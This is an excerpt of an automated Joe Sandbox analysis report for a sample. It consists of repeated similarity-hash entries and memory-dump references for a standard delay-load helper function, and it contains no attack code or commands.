                • API String ID: 1269201914-0
                • Opcode ID: e42baac8e22cf0d55b877fe545ce29c837e26483c75cbd77b9cb248c8525f671
                • Instruction ID: caddff31d579bd04f61ca31974cd18e227fb5a6862f9b27415d487a0a27c6684
                • Opcode Fuzzy Hash: e42baac8e22cf0d55b877fe545ce29c837e26483c75cbd77b9cb248c8525f671
                • Instruction Fuzzy Hash: 5BB012F137C942AC320CA1077D12E3E021CC4C1B11330401AF04DD01C2D6405C190431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c176b206e07d26dafcbb61d748901dace28a432d21130c46013803062243bcac
                • Instruction ID: f77c51fd3cf0977482d853d9733bf3398b4dec6c6f69e8edae17723f2e1b77bb
                • Opcode Fuzzy Hash: c176b206e07d26dafcbb61d748901dace28a432d21130c46013803062243bcac
                • Instruction Fuzzy Hash: 16B012F137C942AC320CA1067E12E3E021CC4C1B11330401AF04DD01C2D6405D1A1431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d6c3db389a829ec0d929eee7764975f355c6076bb90e265bfd36d09ab863731e
                • Instruction ID: bc084330f1b043e0df6cf70b9d02bb2a1b742c18a8658500741edf6d41637a0f
                • Opcode Fuzzy Hash: d6c3db389a829ec0d929eee7764975f355c6076bb90e265bfd36d09ab863731e
                • Instruction Fuzzy Hash: F6B012F137CA42AC324CA1067D12E3E021CC4C1B11331411AF04DD01C2D6805C590431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f293772f0ba4026075e88e36a109511116ffe2d53784d7cd576351aa08466ac0
                • Instruction ID: 1a1ec760095634cf6a9c87f6766bef23ed6fea113d88dc2642633dd83dc1862c
                • Opcode Fuzzy Hash: f293772f0ba4026075e88e36a109511116ffe2d53784d7cd576351aa08466ac0
                • Instruction Fuzzy Hash: A0B012F127DA42AC324CA2067E12D3E020DC4C1B11731411AF14DD01C2D6809C590431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3724680a7f26c12bce0574981797761039095ac990b7bd93f1eea7da91a5f942
                • Instruction ID: 398e48b734a520f13820f3930c8048cd49283b7d7e7dbe0b4e30289887cc99c1
                • Opcode Fuzzy Hash: 3724680a7f26c12bce0574981797761039095ac990b7bd93f1eea7da91a5f942
                • Instruction Fuzzy Hash: 09B012E137D942AC320CA1067E12D3E020DC4C2B11730801AF54DD01C2D6409C190431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 52299ddf2fd30f53da195eda6beaac1f3888719fa986acac6d27cfbc60c2506a
                • Instruction ID: 1033d3ae0a5ef4402d99a890a77b5da0b993c69cd746b1ef3803f96d5cf50b42
                • Opcode Fuzzy Hash: 52299ddf2fd30f53da195eda6beaac1f3888719fa986acac6d27cfbc60c2506a
                • Instruction Fuzzy Hash: 31B012E127CA42AC320DA1167D12D3E024CC4C2B11331801AF54DD01C2D7405C190831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0e98d2de75f328ab20c0c345e4897da5054beac27b35e61818d15a76c26b8afa
                • Instruction ID: 00570d9ed17ca408a53baee61f3d7d288a1915842447d6befc6189281b083703
                • Opcode Fuzzy Hash: 0e98d2de75f328ab20c0c345e4897da5054beac27b35e61818d15a76c26b8afa
                • Instruction Fuzzy Hash: 55B012E127D942AC320CA1067E12D3E024DC8C1B11730401AF18DD01C2D6409C190431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 12f9f239939605230bd9804b80b4df36568c63acee732117f6fc82cdc1ee8a39
                • Instruction ID: 0119b88312d14dd19cef947397ad4a311e8939ae1f01d2e362e47dd08dfe8ee4
                • Opcode Fuzzy Hash: 12f9f239939605230bd9804b80b4df36568c63acee732117f6fc82cdc1ee8a39
                • Instruction Fuzzy Hash: 41B012F127CA42AC320DA1067E12D3E028CC4C1B11730401AF04DD01C2D7405C1A1831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 710825dd9546d614b63687cbd80625d58261eda78d3f4d26a3c9e87cb3640a51
                • Instruction ID: 0b7ce78a8c83ce90ed5e83da9d60c1506567e72b4886ef152cf9eb9ea4a8f059
                • Opcode Fuzzy Hash: 710825dd9546d614b63687cbd80625d58261eda78d3f4d26a3c9e87cb3640a51
                • Instruction Fuzzy Hash: 1EB012E527C541AC320CB1077D02E3E024CC0D4B10330852BF009C1185D6404C1E4432
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8324f4146cc691a836556bb6878370e1269458ed3ea31ee77156b0044920f831
                • Instruction ID: 50c163f7e583f6571017c45a420178754cca7bf00fced57982a5d85c970bce03
                • Opcode Fuzzy Hash: 8324f4146cc691a836556bb6878370e1269458ed3ea31ee77156b0044920f831
                • Instruction Fuzzy Hash: 8EB012F537C541EC320CB1077C02D3E024CC0D0B10330C12BF409C1185D6444D1D4832
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b2f0a2d91f51adc4f06ceb054ee742c51e567871faaa2d572ac800d402a063ab
                • Instruction ID: c8531394d86a45aa7485c494d7238f1686d9a70e1afc651ef7aaf67ff183fbf2
                • Opcode Fuzzy Hash: b2f0a2d91f51adc4f06ceb054ee742c51e567871faaa2d572ac800d402a063ab
                • Instruction Fuzzy Hash: 5AB012E52BC641AC720CB1077D02E3E024CD0D0B10330412BF009C1185D7404C1D4532
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2d4b89a0636be1d2c0e2aeef005f94e2ae734771079e142b5a3ecae7354c918e
                • Instruction ID: f22f3818964ed29df58be2b282c07d0b7cf36cb29c2ab2e353799b85b2b12789
                • Opcode Fuzzy Hash: 2d4b89a0636be1d2c0e2aeef005f94e2ae734771079e142b5a3ecae7354c918e
                • Instruction Fuzzy Hash: 2EB012E537C541AD320C91167D07F3E022CD0E5B10371402AF00AE01C1EB404C1D4031
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d53d8e5712fe1f73501ed3b1d178fb49dbe280b206b03cf7ff04c831ad936482
                • Instruction ID: 5f4c67f62074452289033fabd5dd763d101d5edcfd9cb361c28d0c911364a767
                • Opcode Fuzzy Hash: d53d8e5712fe1f73501ed3b1d178fb49dbe280b206b03cf7ff04c831ad936482
                • Instruction Fuzzy Hash: 99B012E537C646BD330C51027C07D3F021CC0D1B10371412AF005E00C1EB404C5D4031
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 243138e2c1993d16f8c72c3d2c1d8fc26cb21f6541361cf2f4d4a7b29c21749b
                • Instruction ID: aba4c4e12d05542ae209bd0d0a8beee3de3d6b93f70d4ccf17115c0f80068c94
                • Opcode Fuzzy Hash: 243138e2c1993d16f8c72c3d2c1d8fc26cb21f6541361cf2f4d4a7b29c21749b
                • Instruction Fuzzy Hash: FAB012E537C582AD320C91067D07E3F021CC0D5B10371801AF109D01C1EB404C1E4031
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 195f70d6850169b9e01777cc1007f29cf6dca2ced8ec72356a144608e2e85acf
                • Instruction ID: 552230140cf239e589625a4101d66a8e49b94656a5cc7ffc619a88bc4e92255e
                • Opcode Fuzzy Hash: 195f70d6850169b9e01777cc1007f29cf6dca2ced8ec72356a144608e2e85acf
                • Instruction Fuzzy Hash: 53B012E537C542ED320C91067C07E3F026CC0D5B10371801AF409D11C1EB404C1D4031
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDC36
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e64cb978610dc2cfdd67323115df22715af673fb3724a16c2027b6997b9be969
                • Instruction ID: 2dff0f682e12ec7d6f163dee6e8231740d2ad1bab62db2898628701a93ec7c0c
                • Opcode Fuzzy Hash: e64cb978610dc2cfdd67323115df22715af673fb3724a16c2027b6997b9be969
                • Instruction Fuzzy Hash: 7AB012E527CB41BC320C6116BF02C3E022CC1C0F50371461EB10DE00C397C05C595031
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDC36
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ae70dcc46d357f2d223765e435d7b01d172c211347ccc869eccdfe4f2ff28ea2
                • Instruction ID: 65eaac8ffda27f7cc83001c2841577b2c34ca2cee3f82242a0fa04914d618377
                • Opcode Fuzzy Hash: ae70dcc46d357f2d223765e435d7b01d172c211347ccc869eccdfe4f2ff28ea2
                • Instruction Fuzzy Hash: 86B012E527CB41AC320CA11ABD02D3E022CC0C0F50370451FB10DD11C3D7809C194031
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDC36
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
